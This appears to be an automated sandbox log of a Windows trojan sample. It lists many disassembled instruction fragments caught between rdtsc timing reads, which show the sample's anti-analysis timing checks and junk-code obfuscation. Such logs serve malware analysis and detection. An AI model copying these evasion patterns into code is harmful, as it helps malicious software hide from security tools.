Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00950 second address: 4E00997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 movsx edx, si 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FABC9471C2Eh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FABC9471C37h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FABC90CD760h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FABC90CD761h 0x00000017 add ah, 00000026h 0x0000001a jmp 00007FABC90CD761h 0x0000001f popfd 0x00000020 mov ecx, 7443B057h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FABC90CD75Ah 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f jmp 00007FABC90CD75Eh 0x00000034 movzx ecx, bx 0x00000037 popad 0x00000038 and esp, FFFFFFF8h 0x0000003b pushad 0x0000003c mov edi, 04E4F70Eh 0x00000041 pushfd 0x00000042 jmp 00007FABC90CD75Fh 0x00000047 adc ax, 3FBEh 0x0000004c jmp 00007FABC90CD769h 0x00000051 popfd 0x00000052 popad 0x00000053 xchg eax, ecx 0x00000054 pushad 0x00000055 mov ecx, 41CF4EA3h 0x0000005a pushfd 0x0000005b jmp 00007FABC90CD768h 0x00000060 or ecx, 02BA3FE8h 0x00000066 jmp 00007FABC90CD75Bh 0x0000006b popfd 0x0000006c popad 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 call 00007FABC90CD762h 0x00000076 pop ecx 0x00000077 mov di, A606h 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0108 second address: 4DB010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB010E second address: 4DB017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FABC90CD760h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov edi, 1C55E9F0h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FABC90CD766h 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FABC90CD760h 0x00000025 mov ebx, dword ptr [ebp+10h] 0x00000028 pushad 0x00000029 mov al, 34h 0x0000002b mov eax, edi 0x0000002d popad 0x0000002e push ecx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop ebx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB017A second address: 4DB01BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FABC9471C32h 0x0000000e popad 0x0000000f mov dword ptr [esp], esi 0x00000012 jmp 00007FABC9471C30h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FABC9471C2Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB01BF second address: 4DB01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB01CE second address: 4DB01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB01D3 second address: 4DB0229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FABC90CD765h 0x0000000a jmp 00007FABC90CD75Bh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, edi 0x00000014 jmp 00007FABC90CD766h 0x00000019 push eax 0x0000001a jmp 00007FABC90CD75Bh 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 mov ax, 73EBh 0x00000025 push eax 0x00000026 push edx 0x00000027 mov dl, ch 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0229 second address: 4DB0273 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC9471C33h 0x00000008 sub ecx, 69E6B78Eh 0x0000000e jmp 00007FABC9471C39h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FABC9471C2Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0273 second address: 4DB0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0283 second address: 4DB0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0287 second address: 4DB02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAC3B7ABADCh 0x0000000e jmp 00007FABC90CD767h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007FABC90CD766h 0x0000001f je 00007FAC3B7ABAB8h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop eax 0x0000002a mov cx, bx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB02D8 second address: 4DB0328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FABC9471C30h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FABC9471C30h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC9471C2Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0328 second address: 4DB032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB032C second address: 4DB0332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0332 second address: 4DB038D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC3B7ABA9Ah 0x0000000f jmp 00007FABC90CD760h 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007FABC90CD760h 0x0000001d jne 00007FAC3B7ABA89h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FABC90CD767h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB038D second address: 4DB03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 999Ah 0x00000007 jmp 00007FABC9471C2Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test bl, 00000007h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB03AB second address: 4DB03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0721 second address: 4DA0725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0725 second address: 4DA072B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA072B second address: 4DA0772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C32h 0x00000009 xor esi, 19B5DF28h 0x0000000f jmp 00007FABC9471C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007FABC9471C32h 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 movzx esi, di 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0772 second address: 4DA0836 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC90CD769h 0x00000008 or eax, 058BB0A6h 0x0000000e jmp 00007FABC90CD761h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 6BD7h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ch, FEh 0x00000020 mov dx, 8648h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 jmp 00007FABC90CD767h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FABC90CD766h 0x00000033 push eax 0x00000034 jmp 00007FABC90CD75Bh 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushfd 0x0000003d jmp 00007FABC90CD75Bh 0x00000042 sub ax, 7E9Eh 0x00000047 jmp 00007FABC90CD769h 0x0000004c popfd 0x0000004d pop esi 0x0000004e push edi 0x0000004f mov edx, ecx 0x00000051 pop eax 0x00000052 popad 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FABC90CD75Bh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0836 second address: 4DA083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA083C second address: 4DA0840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0840 second address: 4DA0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FABC9471C37h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FABC9471C30h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0879 second address: 4DA087D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA087D second address: 4DA0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0883 second address: 4DA0894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0894 second address: 4DA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0898 second address: 4DA08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007FABC90CD75Ah 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edx, 08EB0DD0h 0x0000001c mov bh, 36h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA08BC second address: 4DA08E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC3BB576E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FABC9471C30h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA08E5 second address: 4DA08E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA08E9 second address: 4DA08EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA08EF second address: 4DA098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 or eax, 2CCC2478h 0x0000000f jmp 00007FABC90CD75Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 pushad 0x00000021 mov eax, 4EF0E543h 0x00000026 mov dx, cx 0x00000029 popad 0x0000002a popad 0x0000002b mov ecx, esi 0x0000002d jmp 00007FABC90CD762h 0x00000032 je 00007FAC3B7B31BEh 0x00000038 jmp 00007FABC90CD760h 0x0000003d test byte ptr [77516968h], 00000002h 0x00000044 pushad 0x00000045 mov cl, 89h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007FABC90CD769h 0x0000004f add ch, FFFFFFD6h 0x00000052 jmp 00007FABC90CD761h 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA098C second address: 4DA09B2 instructions: 0x00000000 rdtsc 0x00000002 call 00007FABC9471C30h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007FAC3BB5763Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 movsx edx, ax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA09B2 second address: 4DA09B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA09B8 second address: 4DA09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA09BC second address: 4DA09F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c jmp 00007FABC90CD765h 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FABC90CD764h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA09F9 second address: 4DA09FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA09FF second address: 4DA0A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0A10 second address: 4DA0A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FABC9471C39h 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FABC9471C2Eh 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0A49 second address: 4DA0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0A4E second address: 4DA0A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABC9471C34h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0A6D second address: 4DA0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0A7C second address: 4DA0A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B23 second address: 4DA0B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B27 second address: 4DA0B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B2D second address: 4DA0B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov bl, 3Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FABC90CD765h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B51 second address: 4DA0B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B57 second address: 4DA0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0B5B second address: 4DA0B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0CCB second address: 4DB0D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7616CE1Fh 0x00000008 mov ax, 2D3Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FABC90CD75Ch 0x00000017 sub eax, 13E49B88h 0x0000001d jmp 00007FABC90CD75Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FABC90CD768h 0x00000029 and si, 7DE8h 0x0000002e jmp 00007FABC90CD75Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FABC90CD75Fh 0x0000003d and ah, 0000002Eh 0x00000040 jmp 00007FABC90CD769h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FABC90CD760h 0x0000004c sbb eax, 61CE52A8h 0x00000052 jmp 00007FABC90CD75Bh 0x00000057 popfd 0x00000058 popad 0x00000059 xchg eax, ebp 0x0000005a pushad 0x0000005b mov al, ACh 0x0000005d mov bh, 57h 0x0000005f popad 0x00000060 mov ebp, esp 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0D88 second address: 4DB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0D8C second address: 4DB0D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0D92 second address: 4DB0DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0DA9 second address: 4DB0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0DAD second address: 4DB0DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0A83 second address: 4DB0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0A89 second address: 4DB0A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0A8D second address: 4DB0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FABC90CD761h 0x00000012 xor al, FFFFFFF6h 0x00000015 jmp 00007FABC90CD761h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FABC90CD760h 0x00000021 or cl, 00000018h 0x00000024 jmp 00007FABC90CD75Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0AE1 second address: 4DB0AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0AE7 second address: 4DB0AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0AF8 second address: 4DB0AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
